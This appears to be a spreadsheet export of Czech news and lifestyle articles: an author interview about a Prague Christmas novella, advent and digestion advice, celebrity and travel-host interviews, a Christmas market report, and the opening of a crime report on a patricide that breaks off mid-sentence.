málem zapomněla, ale vaše knížka mi to znovu připomněla. Berete? Tak to beru! To byl asi Alois Nebel, náš jesenický kamarád a výpravčí z Bílého Potoka. Takhle už se o pár zbloudilých Pražáků postaral a některým i zachránil život. Jedny Vánoce prožil na hlavním nádraží v Praze , kde se naopak Pražáci hezky postarali o něj. Respektive jedna hodná Pražanda, toaletářka Květa. Více v komiksu Alois Nebel, který jsem napsal a který ilustroval taky Jaromír 99 . Asi je to tak, že k vánoční nostalgii a úvahám se člověk propracuje obvykle s věkem. Je vaše nová knížka toho důkazem nebo byste ji dokázal napsat třeba už před deseti lety? To bych ji asi vůbec nebyl schopný napsat. Ale já nechtěl, aby to byla jen nostalgická a melancholická kniha. Je snad i vtipná, i když asi nejvíc je to kniha o velké samotě. Čtu Rudiše , je tam Kafka, taky Hrabal, možná i Hašek a taky Čapek. Byl to záměr nebo se vám tam vloudili náhodou? Jsou to autoři, ke kterým se vracím a které mám spojené právě s Prahou . A tak je zas a znova potkávám. Kdybyste některého z nich potkal doopravdy: Co byste se ho (jich) zeptal? To by bylo krásný. S Hrabalem bych šel na pivo , s Haškem taky. S Čapkem a Kafkou asi spíš do kavárny. Nebo bych si s Kafkou šel zaplavat do Vltavy . On byl prý velmi dobrý plavec. A probrali bychom asi celý svět. Knížku jste napsal původně v němčině, jako už pár těch předchozích. A měla u německých čtenářů velký úspěch. Jak si vysvětlujete, že na ně působí taková docela krátká novela, která je vlastně hlavně o Praze . A vlastně nejen na německé, ale i na čtenáře z jiných zemí. Dobrá otázka. Naplánovat to nijak nejde. Já nikdy nemám velká očekávání, to je pak jeden hned zklamaný. Píšu hlavně trochu pro sebe, musí mě to bavit. Ale samozřejmě mám radost, že si mé knihy berou lidi do vlaku a na cesty a vyrazí z Berlína do Prahy , Liberce nebo do Lomnice . Tuhle mi zase volal pan výpravčí, že na nádraží v Lomnici je parta mých německých čtenářů s mojí knihou a ptají se, kde bydlím. Tak je pak poslal k nám do pivovaru. Na první prolistování zaujmou hlavně mimořádně působivé ilustrace Jaromíra 99. Dotvářejí novelu do malého uměleckého dílka, je to vlastně taková vánoční bibliofilie. Jak vznikly, je k tomu nějaký příběh? S Jaromírem jsme spolu vymysleli komiks Alois Nebel o nádražákovi z Jeseníků , hrajeme spolu v kapele Kafka Band. Jsme staří kamarádi. A Jaromír ilustroval pro německé noviny Frankfurter Allgemeine Zeitung povídku Vánoce v Českém ráji, které se odehrává na Štědrý den v motoráčku cestou do Lomnice . A pak přišla tahle kniha, takhle procházka Prahou . Toulali jsme se spolu Prahou a hledali místa, kde by se mohla odehrávat. Knížku jsem právě dočetla a přemýšlím o ní. Jsou v ní básníci a muzikanti proměňující se v ryby či ptáky, chlapík, který svítí, ale vždycky jen o Vánocích. Shodou okolností jsem taky viděla novou vánoční pohádku pro děti v Divadle Spejbla a Hurvínka , a najednou mi připadalo, že vaše Vánoce v Praze a toto představení pro děti jsou si nějak podobné. Vy jste vlastně napsal pohádku pro starší dospělé. Zjistil jste tedy, že dospělí taky potřebují pohádky? Určitě. Pohádek není nikdy dost. Autor: Martina Fialková Autor person Martina Fialková</t>
  </si>
  <si>
    <t>20241201_364_3488111115_f9962e2f117bb4458746.html</t>
  </si>
  <si>
    <t>f9962e2f117bb4458746</t>
  </si>
  <si>
    <t>DAN NEKONEČNÝ STRKÁ HLAVU DO LVÍ TLAMY</t>
  </si>
  <si>
    <t>20241201_365_3488098707_e9a2fd091bdfed09bbc6.html</t>
  </si>
  <si>
    <t>e9a2fd091bdfed09bbc6</t>
  </si>
  <si>
    <t>MĚLI JSME NŮŽ NA KRKU</t>
  </si>
  <si>
    <t>20241201_366_3488101818_4706b91c4b97addd5008.html</t>
  </si>
  <si>
    <t>4706b91c4b97addd5008</t>
  </si>
  <si>
    <t>MILOVNÍK VALČÍKŮ</t>
  </si>
  <si>
    <t>20241201_367_3473481007_33498d790f879ade70f7.html</t>
  </si>
  <si>
    <t>33498d790f879ade70f7</t>
  </si>
  <si>
    <t>Sedm věcí, na které byste se měla letos o adventu rozhodně vykašlat</t>
  </si>
  <si>
    <t>Sedm věcí, na které byste se měla letos o adventu rozhodně vykašlat Stop Plnění představ druhých Tohle je hodně citlivé téma, které v mnoha rodinách dělá takové zle, že někteří členové kvůli tomu Vánoce doslova nesnášejí a snaží se je radši strávit někde daleko od domova nebo bydliště rodičů či jiných příbuzných. Jde o to, že každý si ideální svátky představuje jinak, a to nejen napříč generacemi, ale také tu hrají roli specifika jako víra, politické názory nebo třeba vztah ke konzumu. I v takzvaně slušných rodinách tak bývá na Vánoce docela dusno. Je dobré si ve vlastním zájmu uvědomit, že nemusíte na sto procent plnit představy druhých, když jsou diametrálně jinde než ty vaše. Nemusíte poslouchat výčitky bodrého strýčka, že nejíte maso. Nemusíte se nechat před širokým příbuzenstvem nechat ztrapňovat dotazy na neexistujícího partnera nebo tikající hodiny. Nemusíte trdlovat pod stromkem ve vánočním svetru nebo poslouchat celé hodiny řev nezvedeného potomstva svého bratra. Co dělat místo toho? Jestli chcete na svátky odletět na Kanáry, tak to udělejte. Jestli nechcete zdobit doma stromeček, tak se na to vykašlete. Nechcete smažit kapra a cpát se salátem s majonézou? Dejte si to, na co máte chuť. Nepijte alkohol , jestli vám nechutná, jen proto, že se to patří. Nezatracujte Vánoce jako takové, ani vztahy s rodinou. Klidně se ale vymluvte z velké rodinné sešlosti, když to není váš šálek kávy. Stavte se u bratra na kafe, u babičky na skleničku domácího vaječňáku nebo u strýce na tetino cukroví. Vezměte někoho z rodiny na procházku. Ale nedělejte si násilí. Vánoce přece mají být svátky pohody, ne stresu a trápení. Autor: Johana Křížková Autor Johana Křížková</t>
  </si>
  <si>
    <t>947160</t>
  </si>
  <si>
    <t>20241201_368_3473481346_e39e362592290635c180.html</t>
  </si>
  <si>
    <t>e39e362592290635c180</t>
  </si>
  <si>
    <t>Kvůli milence se rozvádět nebudu, nejsem blázen, říká Simona Krainová</t>
  </si>
  <si>
    <t>Kvůli milence se rozvádět nebudu, nejsem blázen, říká Simona Krainová Nepije alkohol , nejí přílohy, běhá a posiluje. Karel Vágner šel do sebe. Zhubl už víc jak deset kilo. Jeho manželka Simona Krainová se ho na rovinu zeptala, jestli nemá milenku. Modelka a podnikatelka promluvila v rozhovoru pro iDNES.cz o rodině i současných problémech, které řeší se svou sestrou Yvonou. Karel Vágner šlape svojí manželce na paty. Rozhodnutí přišlo na filmovém festivalu v Karlových Varech . Když se z něj vrátil, změnil životní styl. „Cvičí už víc než já. Já teď nemůžu dělat nic, protože jsem po operaci, a on pořád na sobě pracuje. Tak jsem se ho rovnou zeptala, jestli nemá milenku nebo co se vlastně děje. A prý ne. On by mi to přiznal, my před sebou žádná tabu nemáme,“ překvapuje Simona . A ještě víc šokuje pragmatickou reakcí: „Přešla bych to. Přece se nebudu rozcházet s manželem po patnácti letech, jenom proto, že má milenku!“ 54 fotografií Už dříve dávali najevo, že spolu chtějí zůstat dokud je smrt nerozdělí. Můžou za to jejich děti Max a Bruno, kterým chtějí za každou cenu zachovat rodinu. A právě jejich potomci se stali kmotry nového kosmetického produktu Simony Krainové – bambuckého tělového másla. Proto taky na pozvánce vtipně stálo: Namažeme se spolu! „Kluci měli jít dneska na paintball. Vždycky se oblečou do army oblečků, běhají po lese a to je pro ně nejvíc. Ale já je včera přemlouvala, aby šli sem, protože já je tady v hotelu Augustine před deseti lety křtila. Proto jsem se rozhodla, že tady pokřtím i svoje další miminko – tělové máslo. A přišlo mi správné, aby u toho byli taky. Nejprve se jim nechtělo, ale pak řekli ano. Asi mě milují. Protože focení a podobné věci jinak nesnáší, strašně je to stresuje,“ usmívá se Simona . Na synech ale nebylo žádné znepokojení znát. Bez nervozity zvládli křest a pak si dřepli do koutu a koukali do svých mobilů. „Oni jsou vychovaní. Nechápu to, ale jsou. Zároveň to nejsou žádní panáčci na klíček. Každý je jiný, má svůj charakter. A já je vychovávám hlavně s láskou,“ říká Simona . „Bavím se s nimi jako s dospělými, všechno jim vysvětluji. Říkám, tohle mě dojalo, to bylo krásné, pochválím je, povzbudím, když je třeba a motivuji. Ale umím na ně i zvýšit hlas, když se chovají nepatřičně. Hlavně je do ničeho nenutím, nejsem rodič, který své ambice vkládá do dětí,“ říká Krainová . Simona Krainová , Karel Vágner a jejich synové Max a Bruno (2024) Kluci už vnímají, že je u nich leccos jinak než v rodinách jejich vrstevníků. Že k nim patří mediální pozornost, cestování... A pozitiva, která z toho pramení, umí ocenit. „Bruno mi říká, že jsem strašně sexy matka. Z toho jdu do kolen. A Max se mi tuhle svěřil, že vždycky když přijdu do školy, tak se cítí jako capo di tutti, protože na něj všechny holky koukají,“ usmívá se Krainová . Vnímají, že mají i jinou výchovu. V kuchyňské zástěře svoji mámu často nevídají, i když jídlo od ní jim chutná. „Občas mě přemluví, ať si nic neobjednáváme a něco uvařím. Hodně chtějí rajskou, pak špagety aglio olio a těstoviny na všechny způsoby, takže umím skvěle strouhat parmazán. Hlavně ale milují řízky. A ty mě štvou, protože nesnáším, když mám prsty ulepené od mouky a vajíčka. Ale dětská jídla zvládám celkem dobře,“ konstatuje modelka. Kluci navíc rostou do krásy, takže už o ně projevil zájem módní průmysl. „Jim se do toho zatím nechce a já jsem taky proti. Chci jim ponechat dětství, protože vím, jaké to bylo pro mě, když mě z něj v patnácti vytrhli. Šoubyznys se mnou tenkrát zamával. Snažím se je držet ve škole a vštěpovat jim lidské hodnoty. Třeba Maxík chodí do státní školy, protože se mu tam líbí. Chtěla jsem ho přehlásit do soukromé, kterou navštěvuje Bruno, abychom je nemuseli vozit na dvě různá místa a on řekl, že nechce. Že má rád paní učitelku a má tam svoje kamarády,“ říká Krainová . Snaží se, aby nebyli rozmazlení, ale občas je i zpraží. „Když Bruno rozhrne závěs, vidí, že je venku škaredě a zeptá se, jestli nepojedeme radši do Dubaje , tak mu řeknu: ‚Mlč! Já byla poprvé v deseti letech autobusem v Bulharsku , tak koukej sedět ve škole a až na tebe přijde řada, tak pojedeš‘,“ směje se Krainová . Na party u příležitosti křtu jejího tělového másla se to hemžilo především Slováky, jako by tvořili většinou jejich přátel. „Vždycky jsem měla slovenské kamarády. Začalo to Darou a skončilo Igorem,“ říká Krainová na adresu Igora Kmeti, který v hotelu Augustine zazpíval stejně jako Thia Vittek. S Darou Rolins pojí modelkou dlouholeté přátelství. Daly se dohromady, když zjistili že Sagvan Tofi s nimi hraje ošklivou hru. Chodil souběžně s jednou i druhou. Nakonec dostal od obou kopačky. Ale i jim se nevyhnula krize. Dlouhou dobu spolu nemluvily. Nyní je v podobném nastavení Simona se svojí sestrou Yvonou. Simona Krainová se sestrou Yvonou Maléřovou v Show Jana Krause „Některé energie jsou prostě nestravitelné a člověku je lépe bez nich. Není to vždycky tak, že nejvíc je pokrevní rodina. Já si už vytvořila vlastní rodinu, mám ji ráda a jestli je něco špatně, tak je k tomu asi nějaký důvod. Já jenom vím, že všechno je, jak má být a jestli to bude někdy jinak, netuším,“ svěřila se Simona krátce předtím, než ji Yvona osočila z kopírování. S kosmetikou z bambuckého másla prý přišla už dávno před ní. Vánoce prožije Simona s manželem a dětmi v Česku. Sama by nejraději odletěla do Dominikánské republiky , kde si s manželem staví dům, ale chce děti udělat šťastnými. „Oni české Vánoce se sněhem milují a těší se na ně,“ říká Simona . S dárky se netrápí. „Sdělila jsem jim, že pod stromeček nic nedostanou, protože všechno mají. Úspěšnou pěknou matku, tělové bambucké máslo…,“ směje se. „A oni sami taky řekli, že nic nechtějí. Nemají důvod něco chtít. A my jsme se s Karlem rozhodli, že si budeme dávat velmi osobní dárky, nic bombastického materiálního, spíš si dopřejeme nějaký zážitek,“ prozrazuje Simona . Simona Krainová (2024) Autor: Archiv S. Krainové Simona Krainová , Karel Vágner a jejich synové Max a Bruno (2024) Autor: Archiv S. Krainové Simona Krainová a její synové Max a Bruno (2024) Autor: Archiv S. Krainové Karel Vágner (2024) Autor: Archiv S. Krainové Simona Krainová na křtu své kosmetiky. (2024) Autor: Herminapress Simona Krainová se sestrou Yvonou Maléřovou v Show Jana Krause Autor: FTV Prima Simona Krainová se sestrou Yvonou Autor: Archiv Simony Krainové Simona Krainová se na Instagramu pustila do své sestry Yvony. Autor: instagram.com/simonakrainova Simona Krainová na obálce magazínu Playboy (prosinec 2024), kterou upravil Pasta Oner. Autor: FTV Prima Simona Krainová v magazínu Playboy (prosinec 2024) Autor: Anna Koniaeva Simona Krainová na obálce magazínu Playboy (prosinec 2001) Autor: FTV Prima Simona Krainová předvádí své vysportované tělo. Autor: Instagram Simona si v Karibiku staví svůj sen. Autor: Instagram, Tempus Design Modelka Simona Krainová těší své sledující na Instagramu fotkami z Dominikánské republiky . (duben 2024) Autor: Instagram @simonakrainova Simona Krainová , Karel Vágner , jejich synové Bruno a Max a čivavy Angela a Aisha (1. května 2024) Autor: Instagram / Simona Krainová Simona Krainová na Instagramu (28. února 2024) Autor: Instagram @simonakrainova Simona Krainová a Karel Vágner na finále Miss Czech Republic (13. května 2023) Autor: Profimedia.cz Simona Krainová v Dominikánské republice (16. března 2024) Autor: Instagram / Simona Krainová Simona Krainová Autor: Instagram @simonakrainova Simona Krainová a její sexy video od moře (duben 2023) Autor: Instagram @simonakrainova Simona Krainová (23. května 2024) Autor: HairDreams by Yes Visage Simona Krainová a Karel Vágner (23. května 2024) Autor: HairDreams by Yes Visage Simona Krainová s manželem Karlem Vágnerem Autor: Herminapress Simona Krainová s manželem Autor: iDNES.cz Simona Krainová se syny Autor: archiv Czechoslovak TopModel Simona Krainová a její synové Max a Bruno Autor: Lenka Hatašová , iDNES.cz Simona Krainová s manželem Karlem Vágnerem a synem Brunem Autor: Herminapress Simona Krainová ( Karlovy Vary , 5. července 2018) Autor: Profimedia.cz Simona Krainová Autor: Petr Kozlík , MAFRA Simona Krainová a její čivava AngelA Autor: FTV Prima Simona Krainová na křtu svého kalendáře s názvem Fuck the Age 2020 (26. září 2019, SOHO, Praha ) Autor: Profimedia.cz Simona Krainová Autor: Lenka Hatašová , iDNES.cz Simona Krainová ( Karlovy Vary , 5. července 2018) Autor: Herminapress Simona Krainová Autor: iDNES.cz Simona Krainová Autor: Archiv S. Krainové Igor Kmeťo na křtu nové řady kosmetiky SImony Krainové (2024) Autor: Archiv S. Krainové Simona Krainová na zahájení třetího ročníku soutěže Czechoslovak TopModel Autor: Marek Navrátil pro iDNES.cz Simona Krainová ( Karlovy Vary , 6. července 2017) Autor: Herminapress Ženy, uvědomte si svou sexualitu, vzkazuje Krainová Jsou tam i úchyláci. Ale ty peníze za to stojí, říká Krainová o OnlyFans Autor: Ivana Bachoríková Autor person Ivana Bachoríková</t>
  </si>
  <si>
    <t>20241201_369_3473461925_a60af0bd08907b463c98.html</t>
  </si>
  <si>
    <t>a60af0bd08907b463c98</t>
  </si>
  <si>
    <t>Trápí vás potíže s trávením? Tipy, jak dostat zažívání do pohody</t>
  </si>
  <si>
    <t>Trápí vás potíže s trávením? Tipy, jak dostat zažívání do pohody Pocit plnosti, nadýmání, pálení žáhy či nechutenství? Není výjimkou, že nás trávicí a zažívací potíže na celý den naprosto vyřadí z provozu. Možná si říkáte, že se vás to netýká. Ale ruku na srdce, není to tím, že jste se daný problém naučili ignorovat? Ilustrační snímek | foto: Profimedia.cz Poruchy trávení sužují stále větší počet lidí, kteří své problémy navíc dlouho podceňují nebo ignorují, kvůli čemuž často končí v ordinacích gastroenterologů. Je-li vyloučeno jiné orgánové onemocnění, diagnóza většinou povšechně zní potíže s trávením neboli funkční dyspepsie. Ta může být buď horního, nebo dolního typu. Hlavní spouštěče poruch trávení Špatná životospráva Dlouhodobý stres Nadměrná konzumace alkoholu a kouření Sedavé zaměstnání Nedostatek pohybu Diety Nevhodně zvolené potraviny Refluxem, častým říháním, nevolnostmi po jídle, nechutenstvím či bolestmi žaludku se projevují dyspepsie horního typu. A nadýmání, plynatost, pocit plnosti, zácpa nebo průjem jsou pak příznaky dolního typu dyspepsie. Proč nám není dobře? Tato otázka bohužel nemá jednoznačnou odpověď, faktorů, jež se na vzniku funkčních poruch trávení zásadně podílejí, je celá řada. Nejčastějšími viníky jsou však dlouhodobý stres, špatná životospráva a nevhodně zvolená potrava, příčinou ale můžou být i drastické diety a nedostatek pohybu. V potaz je třeba vzít i následky. Samotné narušení funkce trávicího ústrojí často vede ke zvýšené citlivosti na různé druhy potravin a podílí se také na zvýšení či snížení pohyblivosti střev, která poté mnohdy vyvolá nadýmání a plynatost. Jídlo jako lék Dobrou zprávou je, že funkční poruchy trávení nemusí být chronické. A existuje i způsob, jak s nimi bojovat. Ke zlepšení stavu leckdy vede pouhá úprava jídelníčku. Zkuste chvíli pozorovat, jaká jídla či potraviny vám vadí. Alespoň týden si zapisujte pokrmy, které konzumujete, a uveďte, jak se po nich cítíte. Těch, co vám nesvědčí, se pak snažte vyvarovat. Celkově eliminujte kořeněná, přesolená, příliš tučná a smažená jídla. Na špatné trávení však může mít vliv i syrová zelenina nebo ovoce. Vyloučit je z jídelníčku kvůli tomu nemusíte, zkuste je ale před konzumací nejprve tepelně upravit. Aktuální číslo Předplatné můžete objednávat zde Vedle stravy je také dobré hlídat si dostatečný pitný režim. Dospělý člověk by měl denně vypít dva litry tekutin, ideálně vody. A nezapomínejme ani na pravidelný pohyb, který je prospěšný pro střevní peristaltiku, už půl hodiny svižné chůze má na pohyb střev velký vliv. Přípravky, které uleví Úlevu po jídle vám může přinést mátový čaj i lékořicové bonbony, popřípadě některý z přípravků v běžné obchodní síti. Zažívací potíže s pomocí účinného léku většinou samy odeznějí. Ale pokud se tak ani po týdnu nestane, je na místě návštěva lékaře. Jak účinně bojovat s poruchami trávení Do své životosprávy zařaďte pravidelný pohyb. Omezte konzumaci tučných a kořeněných jídel. Dejte pozor na některé druhy syrového ovoce a zeleniny. Dopřát si můžete banán, citron a grapefruit. Ze zeleniny cuketu, okurku, špenát, rajče, mrkev, cibuli a česnek. Ostatní radši ne. Nekuřte. Kouření dráždí výstelku žaludku. Dbejte na správný pitný režim. Omezte však konzumaci kávy, černého čaje a alkoholu . Dopřávejte si dostatek spánku a relaxace. Jezte pomalu, dobře žvýkejte a po jídle alespoň dvacet minut odpočívejte. Noste volné a pohodlné oblečení, obzvláště přes žaludek. Vynechte opasky. Mějte po ruce účinné pomocníky z lékárny. Autor: Jana Třžilová Autor person Jana Tržilová</t>
  </si>
  <si>
    <t>20241201_37_3479244016_4e73c4115952b996945d.html</t>
  </si>
  <si>
    <t>4e73c4115952b996945d</t>
  </si>
  <si>
    <t>Příběhem promítaným na budovu magistrátu dnes začaly v Ústí vánoční trhy</t>
  </si>
  <si>
    <t>Příběhem promítaným na budovu magistrátu dnes začaly v Ústí vánoční trhy 1. prosince 2024 19:42 | foto: ČTK Příběhem promítaným na budovu magistrátu dnes vpodvečer v Ústí nad Labem začaly vánoční trhy. Světlo, které rozsvítilo vánoční strom, přijelo po laně z radnice na náměstí. Arciděkan římskokatolické farnosti Miroslav Šimáček stromu požehnal a pronesl poselství. O úvodní vystoupení se poté postarala kapela The Tap Tap. Slavnostní zahájení připravili umělci z ateliéru designu a digitálních technologií Vysoké školy uměleckoprůmyslové v Praze . V příběhu zvídavý kosmonaut vdechl svým dotekem život jedné z hvězd, která padá na zem, kde hledá cestu skrz spletité uličky Ústí nad Labem . Rozpoznat mohli lidé při videomappingu na průčelí magistrátu řadu významných objektů v podobě soch a sousoší či architektonických památek. Nakonec hvězda zažehla devítimetrový smrk ztepilý, který městu darovali manželé z Řehlovic . "To hlavní je, abychom Vánoce našli ve svém srdci, abychom našli schopnost milovat, mluvit pravdu, schopnost mít soucit s druhými, to bych vám všechno přál," uvedl Šimáček. Akci pořádá druhým rokem Kulturní středisko. Jeho cílem je propojit vánoční atmosféru s charitativní myšlenkou a podporou těch, kteří nemají štěstí Vánoce strávit po boku blízkých. Na všech propagačních materiálech je QR kód, díky kterému má veřejnost příležitost zakoupit lidem bez domova nocleženky. "Myslíme si, že Vánoce jsou tak trochu i o dělání dobrých skutků," uvedl k letošní dobročinné novince ředitel Kulturního střediska Jan Kvasnička s tím, že městská příspěvková organizace spojila síly s Charitou Ústí nad Labem . Program Vánoc v krajském městě včetně osvětlení vyjde asi na tři miliony korun. Nechybí stánky se svařeným vínem , občerstvením a vánočním zbožím. Program na každý den až do 23. prosince najdou zájemci na webu. Autor: ČTK Témata: Okres Ústí nad Labem | Aktuální zprávy, články a informace Sdílet na Facebooku Sdílet na síti X Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241201_370_3503290542_8219f1a94a5c13a6db4f.html</t>
  </si>
  <si>
    <t>8219f1a94a5c13a6db4f</t>
  </si>
  <si>
    <t>JOSEF VRTAL: PRŮMĚRNÁ JIHOKOREJSKÁ KAVÁRNA VYPADÁ JAKO PRODEJNA VOZŮ V ČESKÉ REPUBLICE</t>
  </si>
  <si>
    <t>Shrnutí JOSEF VRTAL : PRŮMĚRNÁ JIHOKOREJSKÁ KAVÁRNA VYPADÁ JAKO PRODEJNA VOZŮ V ČESKÉ REPUBLICE Rubrika: ROZHOVOR Josef Vrtal , známý automobilový nadšenec a moderátor pořadů Fotr na tripu a Autosalon, má cestování a auta hluboko zakořeněné ve svém životě. Pracovní a rodinný život spojil do jednoho velkého životního projektu, který mohou diváci pravidelně sledovat na televizních obrazovkách. V rozhovoru se Josef rozpovídal o tom, co všechno obnáší natáčení pořadu Fotr na tripu, jaké výzvy i radosti přináší rodinné cestování v autě a kam by třeba nikdy s rodinou nejel. Jak to všechno stíháte? Stíháme to tak, že jsme to všechno smíchali dohromady do jednoho hrnce jako guláš. Cestujeme, natáčíme, pracujeme a vychováváme děti na cestách. Už jsme si na to zvykli. Je to dobré. A i když jsem tady říkal, že ty cesty jsou složité a chtěl bych si dát pauzu, tak stejně po čtrnácti dnech doma pokukuji po mapě, kam bych zase jel. Říkal jste, že byste jel i na dovolenou, ale umíte si představit obyčejnou válecí dovolenou? Ležet u moře a odpočívat. Já si to dovedu představit. Když se moc pohybujete, tak to potřebujete. Já se potřebuju po každé cestě zastavit a dívat se celý den na stupidní jihokorejský seriál, jíst českou svíčkovou a pít dobré pivo . To je to, co si po těch dlouhých cestách kolikrát přeji. Kdo plánuje cesty? Destinaci vybíráme dohromady jako rodina, ale ta jednotlivá místa vybírám já. Samozřejmě je konzultujeme, protože jich vždycky vyberu víc. Tím, jak tu telku dělám, tak než na ta místa jedu, už je vidím v televizi. Už vím, že bude dobré natočit tohle místo a za ním to další, protože budou odlišná. Jednou je to hrad, podruhé jeskyně, potřetí třeba vlak v tunelech. Já si ten díl skládám dramaturgicky v hlavě a podle toho ta místa definitivně vybírám tak, aby to diváky bavilo. Jak řešíte ubytování? Ubytování řešíme na cestě. Řešíme ho maximálně tři dny předem, kolikrát v ten samotný den. Jediné ubytování, které řešíme třeba i hodně dopředu, souvisí třeba s dopravou. Například trajekt z ostrova na ostrov. Víme, že ten trajekt nám tam dojede tehdy a tehdy a na to konto zamlouváme ubytování. Jinak hodně improvizujeme. Neubytováváme se napřímo, ale přes platformy typu Booking a Agoda. Když je problém nebo se něco nepovede, tak máme nějakou páku na ty ubytovatele. A že se občas nepovede. Máte někdy o děti strach? Stává se nám na každé cestě, že holky musí zůstat na ubytování. Zavřou se tam a jsme ve spojení na telefonu. My jedeme něco zařizovat třeba na úřady nebo točit noční město. Pepinka je v tomhle velmi zodpovědná a zvládne se postarat o ségru. Jsou situace, kdy jsou samy celý den. Když jsme přiletěli do Jižní Koreje , tak jsme museli převzít auto, vybavit ho a namontovat příslušenství. V Soulu byly příšerné zácpy. Ráno jsme z hotelu vyjeli v osm. Holky byly po snídani. A já jsem si myslel, že přijedeme ve dvě odpoledne. Přijeli jsme v šest večer. Holky musely samy vyvenčit psa, jít na jídlo a postarat se o sebe. Samozřejmě v bezpečném prostředí. Bývají často samy a to se někdy o ně bojím. Člověk může narazit na nějakého pitomce kdekoli na světě. Tomu se nedá ubránit. Jak to řešíte se školou? Paní Columbová je původním povoláním učitelka. Holky se vždycky vzdělávaly doma a na cestách. Plánujete nějaký díl, který bude moderovat paní Columbová? Paní Columbová bude vždycky v pozadí jako takový tajemný prvek toho pořadu. Vždy tam někde tak trošku bude vidět, pokud na to bude vhodná situace. Myslím si, že lidé její roli přijali a určitě ji nebudeme měnit. Máte už plány na rok 2025? Pojedeme teď země kolem Baltského moře a v létě nás čeká Amerika nebo Afrika . Pokud Amerika , tak to budou státy jako Nové Mexiko , Nevada , Arizona a Texas . Pokud to bude Afrika , tak to bude jedna jediná země, a to Tanzanie . Kam chtějí holky? Ty to mají padesát na padesát. Amerika je už dlouho láká a Tanzanie je zase plná zvířátek a velkých národních parků. Pepinka chce být veterinářka. Kolik dní v roce strávíte na cestách? Sto dní v létě a sto dní v zimě. Na každý díl potřebujeme deset dní. A to není o tom, že bychom deset dní točili. Je tam započítán nějaký čas na plánování a alespoň jeden den odpočinku pro holky. My víme, že za deset dní natočíme opravdu jeden pěkný díl. Kolik kilometrů průměrně ujedete za těch sto dní? Od patnácti do dvaceti tisíc kilometrů. Většinou. Cesty máte spojené i s testováním aut. Vybíráte si auto na cestu vy sám nebo je vám přiděleno? Auta nám nabízí automobilky. To není žádné tajemství. Automobilky nám i přispívají do rozpočtu té cesty. Oni ví, že auto v rámci pořadu jde vidět v úplně jiné situaci. Je to něco jiného než testování třeba v Autosalonu. Navíc televize díly poměrně často reprízuje. Partneři pořadu druhé a třetí vysílání v televizi mají „zadarmo“. Vím, že jste skeptik elektromobilů. Vydal jste se někdy v rámci pořadu Fotr na tripu na silnice s plně elektrickým automobilem? Ne. Jediný elektromobil, kterým bych na tuhle cestu jel, by byl Rolls-Royce . A hybrid? Tím jsme už jeli, ale čistě elektro neplánujeme. Dovedete si představit život jinde než v České republice ? Dovedu, určitě. Upřímně, když hodně cestujete, tak i když tu máme blbé politiky, inflaci a lidé nadávají na kde co, máme se pořád strašně dobře. Česká republika je krásná, ale i tak si dovedu představit žít někde jinde. A kdybyste byl konkrétní? Určitě je to severní Afrika a severské země jako Skotsko a Irsko . Mě třeba láká i Asie . Dovedu si představit třeba Japonsko . Která země vás nejvíce vytrestala? Pokud jde o počasí, tak to nás nejvíce vytrestalo Skotsko . To bylo peklo. I když jsme tam byli v létě, tak jsme zažili čtyři roční období. Vytrestalo nás to i jídlem. Nebyly tam žádné dobré kavárny. Paní Columbová potřebuje každé ráno dobré kafe. Oproti tomu v Koreji byly kavárny úplně nepředstavitelné. Průměrná jihokorejská kavárna vypadá jako prodejna vozů v České republice . Když v Liberci pojedete a narazíte na nějaký showroom automobilky, tak asi tak vypadá průměrná kavárna v Koreji . I na vesnici. Natáčel jste s rodinou pořad v Iráku , Ázerbájdžánu , Kazachstánu a Uzbekistánu . To nejsou zrovna obvyklé dovolenkové destinace. Je země, kam byste spolu nikdy nejeli? Nepojedeme nikam tam, kde nemají rádi pejsky, jako Vietnam . A nepojedeme někam, na čem se všichni neshodneme. Jaký je váš nejoblíbenější dopravní prostředek po autu? Loď a po lodi asi už nic. Nemám rád letadla, už jsem toho hodně nalétal. Loď je super, je to větší svoboda než auto. Určitě jednou vznikne Fotr na lodi. A pak pokračování Ségry na tripu. Autor: Text: Lucie Zdenková Foto: Archiv Josefa Vrtala Autor person Lucie Zdenková Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>20241201_371_3473471838_c72bfa360a397ac2c141.html</t>
  </si>
  <si>
    <t>c72bfa360a397ac2c141</t>
  </si>
  <si>
    <t>Umlátil otce boxerem a uprchl do Německa. Snažil se mě vytočit, hájil se</t>
  </si>
  <si>
    <t>Shrnutí Umlátil otce boxerem a uprchl do Německa . Snažil se mě vytočit, hájil se Vztáhnout ruku na vlastní rodiče? Pro většinu lidí naprosté tabu. Policejní statistiky ovšem ukazují, že násilí mezi příbuznými je paradoxně velmi časté. Historie české kriminalistiky zná ostatně celou řadu matkovrahů i otcovrahů. Nedávno jejich řady rozšířil Jihomoravan Dušan Kocman. První měsíc roku 2023 se chýlil ke svému konci. Psalo se 30. ledna, když se bytem v Hustopečích na Břeclavsku začal rozléhat křik. Šlo o průvodní jev sporu dvou spolubydlících, padesátiletého Dušana Kocmana a jeho jedenasedmdesátiletého otce Josefa. V mladším z mužů – někdejším pracovníkovi bezpečnostní služby a tou dobou nezaměstnaném zedníkovi – se něco zlomilo. Popadl pepřový sprej a nastříkal jej svému „protivníkovi“ do obličeje. Následně odhodil zbytek zábran a začal řádit způsobem, pro který je nemožné najít pochopení. „Všude mě pomlouval, že mě musí živit. Přitom jsem prodal auto a dal mu asi šedesát tisíc korun. Nechápal jsem, proč o mně příbuzným a známým vykládá takové věci.“ Látka, jež dokáže zpacifikovat i ty nejdrsnější chlapy, zasáhla Josefa do obličeje i na brýle. Odešel do koupelny, aby se opláchl vodou. Spor však nadále gradoval. Dušan se nakonec chopil ne úplně tradiční zbraně, a sice boxeru. Začal svého otce zasypávat tvrdými ranami, směroval je do hlavy, hrudníku i do zad, čímž své oběti způsobil rozsáhlá poranění, která se jí stala osudnými. Kocmanova brutalita ale stále neměla dost. Zřejmě ze strachu, že by krvácející penzista mohl zavolat policii, se jej rozhodl umlčet. Spoutal mu ruce a na hlavu nasadil igelitový pytel na odpadky. 6 fotografií Když Josef zemřel, Dušan chladnokrevně zabalil jeho tělo do několika dalších igelitových pytlů. Ty následně zalepil páskou a mrtvolu odklidil za sedačku v obývacím pokoji. Pak byt opustil. Tělo na daném místě leželo zhruba měsíc. Mrtvolu objevili náhodou K jeho objevu vedla de facto náhoda. Jelikož Josef nedorazil na domluvenou schůzku, jeho kamarád začal tušit něco zlého a zburcoval hustopečskou městskou policii. Ve středu 1. března přišel jeden ze strážníků zkontrolovat byt Kocmanových, a když mu nikdo neotevíral, oslovil 